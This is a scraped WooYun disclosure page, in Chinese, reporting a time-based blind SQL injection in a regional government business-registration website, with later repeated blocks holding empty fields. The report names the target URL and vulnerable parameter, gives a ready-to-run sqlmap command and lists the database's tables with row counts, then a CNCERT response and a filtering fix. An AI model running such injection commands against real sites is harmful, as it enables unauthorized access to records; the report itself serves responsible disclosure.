某工商行政管理局系统注入一枚 | wooyun-2015-0130194| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130194

漏洞标题：某工商行政管理局系统注入一枚

漏洞作者：路人甲

提交时间：2015-07-29 16:41

修复时间：2015-09-14 16:00

公开时间：2015-09-14 16:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-29：细节已通知厂商并且等待厂商处理中
2015-07-31：厂商已经确认，细节仅向厂商公开
2015-08-10：细节向核心白帽子及相关领域专家公开
2015-08-20：细节向普通白帽子公开
2015-08-30：细节向实习白帽子公开
2015-09-14：细节向公众公开

简要描述：

oracle 基于时间的盲注

详细说明：

url
http://wljg.xags.gov.cn//wzxx.do?catagoryid=351&flag=6&method=enterIndex&parentid=350
postdata:
catagoryid=351&curPage=1&keywords=1&pageSize=20&parentid=350

web application technology: JSP
back-end DBMS: Oracle
Database: WLJGWEB
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| HZ_QYHZNR             | 884523  |
| SN_NNJ_DJZGJGSH       | 879935  |
| HZ_QYFDDBR            | 868671  |
| NNJ_DJZGJGSH_20130410 | 541473  |
| SYS_EWMXX             | 294544  |
| SN_HZ_QYFDDBR         | 220656  |
| SN_HZ_QYHZNR          | 136779  |
| BF_QYHZNR             | 116470  |
| SN_BF_QYHZNR          | 116470  |
| WSBS_HZ_WSBS          | 8354    |
| WSBS_HZ_WSBS_BAK      | 7774    |
| WSBS_XT_USER          | 5612    |
| WSBS_XT_USERGROUP     | 5597    |
| REFRESH_SN_LOG        | 1427    |
| BM_HY                 | 1397    |
| BF_BM_GXDW            | 767     |
| WSBS_BF_WSBS          | 621     |
| BM_BZ                 | 180     |
| BM_QYLX               | 166     |
| BM_QYLX_OLD           | 166     |
| BF_BM_DJJG            | 127     |
| GZTX                  | 76      |
| CATAGORY              | 43      |
| WSBS_MB_KEYMAKER      | 43      |
| WSBS_BM_AREA          | 34      |
| FILEMANAGE            | 26      |
| BM_DJJG               | 24      |
| CATAGORY_BAK          | 18      |
| WSBS_XT_SZ            | 10      |
| LINK                  | 8       |
| BM_QYDL               | 6       |
| WSBS_WZSZ             | 6       |
| TEMPLATE              | 4       |
| BM_GTZCXS             | 2       |
| WSBS_DZZZ             | 2       |
| WSBS_HZ_XZ            | 2       |
| WSBS_XT_GROUP         | 1       |
| WSBS_XT_KHPJ          | 1       |
+-----------------------+---------+

漏洞证明：

sqlmap.py -u "http://wljg.xags.gov.cn/wzxx.do?catagoryid=351&fla
g=6&method=enterIndex&parentid=350" --data "catagoryid=351&curPage=1&keywords=-1
&pageSize=20&parentid=350" --batch --thread 8 --current-db

修复方案：

对keywords进行特殊字符过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-07-31 15:59

厂商回复：

CNVD未直接复现所述情况，按照漏洞报送者所述情况整理通报，转由CNCERT下发给陕西分中心，由陕西分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130194

漏洞标题：某工商行政管理局系统注入一枚

相关厂商：某工商行政管理局

漏洞作者：路人甲

提交时间：2015-07-29 16:41

修复时间：2015-09-14 16:00

公开时间：2015-09-14 16:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130194

漏洞标题：某工商行政管理局系统注入一枚

相关厂商：某工商行政管理局

漏洞作者： 路人甲

提交时间：2015-07-29 16:41

修复时间：2015-09-14 16:00

公开时间：2015-09-14 16:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130194"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云